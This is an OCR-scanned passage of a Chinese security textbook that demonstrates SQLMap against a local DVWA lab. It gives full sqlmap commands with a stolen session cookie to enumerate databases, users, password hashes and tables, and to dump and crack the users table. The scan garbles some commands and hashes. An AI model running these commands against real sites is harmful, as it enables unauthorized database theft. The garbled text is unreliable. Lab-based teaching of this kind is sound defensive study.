65 SQLMap 

在 Web 安 全 领域 中 ，SQL 注 入 漏洞 占 比 漏洞 总 数 的 30% 左 右 ， 引 起 大 量 开 发 者 的 重视 ， 
但 是 目前 仍然 有 很 多 网 站 出 现 SQL 注 入 漏洞 ， 可 以 说 这 是 一 个 屡禁不止 的 漏洞 问题 。 

大 部 分 攻击 者 挖掘 SQL 注入 漏洞 通常 会 使 用 SQLMap 来 作为 辅助 工具 ， 本 节 通 过 学 习 
SQLMap 来 了 解 攻击 者 是 如 何 发 现 SQL 注 入 并 利用 的 ， 同 时 也 可 以 通过 SQLMap 快 速 对 网 站 
做 一 次 SQL 注入 检测 。 

本 节 将 使 用 SQLMap 通 过 一 个 URL 地 址 得 到 以 下 信息 : 

(1) MySQL 当 前 所 使 用 的 账户 。 

(2) 数据 库 中 的 所 有 账户 。 

(3) 所 有 数据 库 名 称 。 

(4) 某 个 数据 库 的 全 部 表 名 称 。 

(5) 导出 指定 数据 表 中 的 所 有 用 户 名 与 密码 。 

我 们 知道 , 网 站 中 某 些 页 面 登 录 之 后 才能 打开 , 然而 登录 需要 有 浏览 器 才 可 以 , SQLMap 
只 有 一 个 命令 行 ， 显 然 无 法 登录 ， 因 此 如 果 要 使 用 SQLMap 检 测 ， 必 须 登 录 才 能 打开 页 面 地 
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址 ， 我 们 可 以 先 通过 浏览 器 登录 ， 再 把 浏览 器 保持 登录 的 信息 提取 出 来 。 

而 会 话 信 息 通常 存储 在 Cookie 中 ,这 里 使 用 谷歌 浏览 器 中 的 审查 工具 获取 ， 获 取 的 方式 
是 在 浏览 器 审查 工具 中 找到 Network 选 项 卡 ， 再 找到 左 侧 列表 中 的 第 一 个 请 求 ， 在 请 求 信息 
Headers 中 找到 Cookie， 将 其 复制 下 来 ， 如 图 6-21 所 示 。 
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,localhost/security.php 
Upgrade-Insecure-Requests: 1 
User-Agent: Mozil1a/5.8 (Windows NT 10.9; NDN54) ApplewebKit/537.35 (KHTNL, like Gecko) Chrom 





Mequests | TOKBtranstened | Fi 


图 6-21 谷歌 浏览 器 获取 网 站 Cookie 的 方法 





当前 得 到 的 Cookie 为 “PHPSESSID=2q655qe317ekvto9281n6qf334; security=low”。 

现在 需要 找 一 个 存在 SQL 注 入 漏洞 的 链接 地 址 进行 测试 , 笔者 使 用 的 是 一 个 比较 知名 的 
Web 测 试 系统 DVWA, DVWA 的 安装 过 程 较为 简单 , 此 处 不 做 讲解 , 可 通过 百度 搜索 “DVWA 
安装 教程 ”找到 。 在 浏览 器 中 打开 DVWA 的 页 面 并 登录 之 后 ， 在 DVWA Security 页 面 中 将 
DVWA 安 全 等 级 设置 为 Low， 如 图 6-22 所 示 。 
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图 6-22 设置 DVWA 的 测试 等 级 
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后 单 击 页 面 左 侧 菜 单 中 的 “SQL Injection” 部 分 ， 在 表单 中 输入 任意 值 并 提交 。 可 以 
os 览 器 的 地 址 变 成 了 “http://dvwa.localhost/vulnerabilities/sqli/?id=1 &Submit=Submit#” 
但 我 们 并 不 知道 注入 点 在 什么 位 置 ， 所 以 接 下 米 的 测试 就 是 让 SQLMap 找 到 此 链接 的 注 
入 点 。 


6.5.1 ”查看 数据 库 账户 
现在 我 们 通过 一 个 URL 地 址 得 到 该 数据 库 当 前 所 使 用 的 账户 信息 ,这 里 需要 给 SQLMap 
提供 存在 注入 点 的 URL 以 及 相关 的 Cookie 信 息 ， 因 此 得 出 以 下 命令 : 


sqlmap.py -u "http://dvwa.localhost/vulnerabilities/sqli/?id=]1 &Submit=Submit" 
--Cookie="PHPSESSID=2q655qe317ekvto9281n6gf334;security=low" -b --current-db --current-user 








在 上 面 的 命令 中 有 很 多 个 参数 ， 下 面 将 解读 这 些 参数 的 意义 

多 -cookie: 设置 的 Cookie 值 ， 在 此 处 是 为 了 保持 登录 状态 以 及 测试 等 级 。 
ba : 指定 目标 URL。 

4 -b: 获取 DBMS banner。 
多”--current-db: 获取 当前 数据 库 。 
多”--current-user: 获取 当前 用 户 。 





结果 如 图 6-23 所 示 。 








图 6-23 SQLMap 成 功 找到 注入 点 


在 图 6-23 中 可 以 看 到 如 下 信息 : 


web application technology: Apache 2.4.23, PHP 5.6.25 
back-end DBMS: MySQL >= 4.1 
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banner: "3.0.51b-community-nt-log' 
[09:18:59] [INFO] fetching current user 
Current user: 'root(@localhost 
[09:18:59] [INFO] fetching current database 
current database: "dvwa' 


SQLMap 会 返回 后 台 使 用 的 一 些 版 本 信息 , 包括 Web 服 务 器 、 后 端 语言 、 数 据 库 版 本 等 ， 
而 这 次 扫描 后 ，SQLMap 反 馈 网 站 后 台 使 用 的 Web 服 务 器 为 Apache 2.4， 使 用 的 语言 为 PHP 
5.6， 后 台数 据 库 管理 系统 的 版 本 为 MySQL 4.1 版 本 以 上 ， 数 据 库 版 本 为 5.0.51b-community， 
当前 使 用 的 用 户 为 Root 并 通过 Localhost 连 接 ， 当 前 使 用 的 数据 库 为 DVWA 。 


6.5.2 ”查看 数据 库 中 的 所 有 账户 

下 面 将 对 数据 库 管理 系统 中 的 所 有 用 户 进行 遍历 ， 并 尝试 破解 出 真实 密码 ， 需 要 给 
SQLMap 提 供 的 依然 是 URL 地 址 和 Cookie 信 息 ， 并 通过 参数 “--users ”和 “--password” 给 
SQLMap 传 达 我 们 需要 得 到 结果 的 指令 。 以 下 命令 用 来 枚 举 该 数据 库 管理 系统 中 所 有 的 用 户 
和 密码 hash， 在 以 后 更 进一步 的 攻击 中 ， 可 以 对 密码 hash 进 行 破解 : 














县 
EE 


sqlmap.py -u "http://dvwa.localhost/vulnerabilities/sqli/?id=1 &Submit=Submit" --cookie= 
"PHPSESSID=2q655qe317ekvto9281n6qf334;security=low" --users --password 


在 上 面 的 命令 中 有 很 多 参数 ， 下 面 将 解读 各 个 参数 的 意义 。 
多 --users: 枚 举 DBMS 用 户 。 
多”--password: 枚 举 DBMS 用 户 密码 hash。 


返回 结果 如 图 6-24 所 示 。 








图 6-24 SQLMap 返回 了 所 有 用 户 账号 
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从 SQLMap 的 返回 结果 中 可 以 看 到 该 数据 库 管 理 系统 存在 两 个 账户 ， 限 定 了 5 个 host 
连接 。 

[*] "@'localhost' 

[的 "@'production.mysql.com' 

[*] ‘root (@'127.0.0.1' 

[*] 'root (@'localhost' 

[*] 'root @'production.mysql.com' 


我 们 在 命令 中 加 入 了 参数 “--password”， 所 以 SQLMap 在 得 到 账户 信息 之 后 ， 还 会 去 


尝试 还 原 出 MySQL 的 真实 密码 。 下 面 是 还 原 出 Root 账户 的 密码 结果 。 


bi 


database management system users password hashes: 
[*] root [1]: 
password hash: NULL 


从 返回 结果 中 可 以 看 出 ， 该 账户 未 设置 密码 。 
6.5.3 ”获取 所 有 数据 库 名称 

查看 一 个 数据 库 管 理 系 统 中 有 多 少 个 数据 库 是 开发 者 经 常会 做 的 一 件 事情 , 同时 也 是 攻 
击 者 经 常 做 的 事情 。 下 面 将 介绍 如 何 通 过 SQLMap 查 看 一 个 数据 库 管 理 系 统 中 有 哪些 数据 
库 ， 命 令 如 下 : 


sqlmap.py -u "http://dvwa.localhost/vulnerabilities/sqli/2id=1&Submit=Submit" 
--cCookie="PHPSESSID=2q655qe317ekvto9281n6qf334;security=low" --dbs 


在 这 条 命令 中 , 除了 提供 最 基本 的 URL 和 Cookie 信 息 以 外 , 还 使 用 了 一 个 参数 “--dbs”， 
此 参数 的 作用 正 是 枚 举 DBMS 中 的 数据 库 ， 执 行 完 命令 之 后 的 返回 结果 如 图 6-25 所 示 。 








图 6-25 ”数据库 列表 
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结果 如 下 : 


available databases [4]: 

[9] dvwa 

[*] information schema 

[*] mysql 

[*] test 

从 结果 中 可 以 看 到 该 数据 库 管理 系统 中 存在 4 个 数据 库 ， 分 别 是 information_schema、 
mysql、test、dvwa， 因 此 说 明 获取 所 有 数据 库 名 称 已 经 成 功 。 


6.5.4 获取 数据 库 表 名 称 
在 得 到 数据 库 名 称 之 后 , 接 下 来 可 以 查看 数据 库 中 有 哪些 数据 表 , 下 面 将 
数据 库 的 所 有 表 名 称 ， 执 行 的 命令 如 下 : 


sqlmap.py -u "http://dvwa.localhost/vulnerabilities/sqli/?id=1 &Submit=Submit" 
--Cookie="PHPSESSID=2q655qe317ekvto9281n6gf334:;security=low" -D dvwa --tables 





在 这 个 命令 中 , 参数 “-D” 代 表 需 指定 某 一 个 数据 库 , 参数 “--tables” 则 代表 枚 举 DBMS 
数据 库 中 的 数据 表 ， 最 终 获 取 数 据 库 表 名 称 的 返回 结果 如 图 6-26 所 示 。 








图 6-26 数据 库 表 名 称 列表 


得 到 的 结果 如 下 : 


Database: dvwa 
[2 tables] 
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| guestbook | 
| users | 
十 十 





从 返回 结果 中 可 以 看 出 ， 数 据 库 dvwa 中 存在 两 个 数据 表 ， 即 guestbook 和 users。 
6.5.5 ”查看 表 结 构 


在 得 到 数据 表 名 称 之 后 , 攻击 者 可 以 通过 表 结 构 分 析出 字段 的 作用 是 什么 。 下 面 将 通过 
SQLMap 获 取 用 户 表 的 结构 信息 ， 命 令 如 下 : 





sqlmap.py -u "http://dvwa.localhost/vulnerabilities/sqli/?id=1 &Submit=Submit" 
--Cookie="PHPSESSID=2q655qe317ekvto9281n6qf334;security=low" -D dvwa -Tusers --columns 


在 参数 中 ，“-T” 代 表 指 定 要 枚 举 的 DBMS 数 据 库 表 ， 参 数 “ - columns” 则 指 需要 枚 
举 DBMS 数 据 库 表 中 的 所 有 列 。 如 图 6-27 所 示 是 执行 命令 后 的 返回 结果 。 








图 6-27 通过 SQLMap 获取 表 结 构 信 息 


结果 如 下 : 


Database: dvwa 


Table: users 

[8 columns] 
十 

| Column |Type | 
和 

| user |varchar(15)| 
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avatar | varchar(70) | 
failed login | int(3) | 
first name |varchar(15)| 
last login |timestamp | 


last name | varchar(15) | 
password | varchar(32) | 
user id | int(6) | 





十 ---- 





由 


从 返回 结果 中 可 以 看 到 ， 表 “users” 的 字段 名 称 以 及 字段 类 型 都 已 经 被 罗列 出 来 了 , 通 
过 字段 名 称 以 及 类 型 可 以 分 析出 ， 字 段 “user” 和 字段 “password” 分 别 为 用 户 名 和 密码 ， 
而 攻击 者 往往 对 用 户 名 和 密码 非常 感 兴趣 ， 接 下 来 会 重点 测试 这 两 个 字段 。 


6.5.6 ”导出 数据 


在 得 到 库 名 称 、 表 名 称 ， 甚 至 是 字段 名 称 之 后 , 我 们 接着 尝试 导出 攻击 者 感 兴趣 的 字段 
内 容 ， 将 表 中 的 所 有 用 户 名 与 密码 dump 导 出 的 命令 如 下 : 
sqlmap.py -u "http://dvwa.localhost/vulnerabilities/sqli/?id=1 &Submit=Submit" 


--cookie="PHPSESSID=2q655qe317ekvto9281n6qf334;security=low" -D dvwa -T users 
-C user,password --dump 


现在 介绍 命令 中 参数 的 含义 ,参数 “--dump” 是 指 转 侍 DBMS 数 据 表 项 , 在 执行 过 程 中 ， 
SQLMap 如 果 发 现 密码 类 型 的 数据 ， 就 会 询问 是 否 破解 密码 ， 按 回 车 键 直 接 确认 将 会 尝 i 
密 ， 如 图 6-28 所 示 ， 密 码 已 经 被 解密 出 来 。 








[1] default d E:\www\sqlmap\txt\wordlist. zip” (press Enter) 
2] tom (i 


e with lis' ary files 


ldo you want to use col 


smithy 





图 6-28 SQLMap 返回 了 账号 与 密码 信息 
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执行 命令 后 ,我 们 看 到 了 users 表 中 所 有 的 用 户 名 与 明文 以 及 解密 出 来 的 密码 ,结果 如 下 : 


Database: dvwa 


Table: users 

[5S entries] 

et ee + 

| user | password | 
i OE EE 十 





| 1337 | 8d3533d75ae2c3966d7e0d4fcc69216b (charley) | 
|admin |5f4dcc3b5aa765d61d8327deb882cf99 (password) | 
| gordonb | e99al8c428cb38d5f260853678922e03 (abc123) | 
|pablo “|0d107d09fSbbe40cade3de5c71e9e9b7 (letmein) | 
| smithy | 5 他 dcc3bSaa765d61d8327deb882cf99 (password) | 
十 --------- 十 


导出 的 数据 默认 会 存储 在 用 户主 目录 下 的 .sqlmap\output\dvwa.localhost.csv 文 件 中 , 打开 
文件 可 以 看 到 后 台 的 管理 员 账 号 以 及 密码 信息 。 


和 


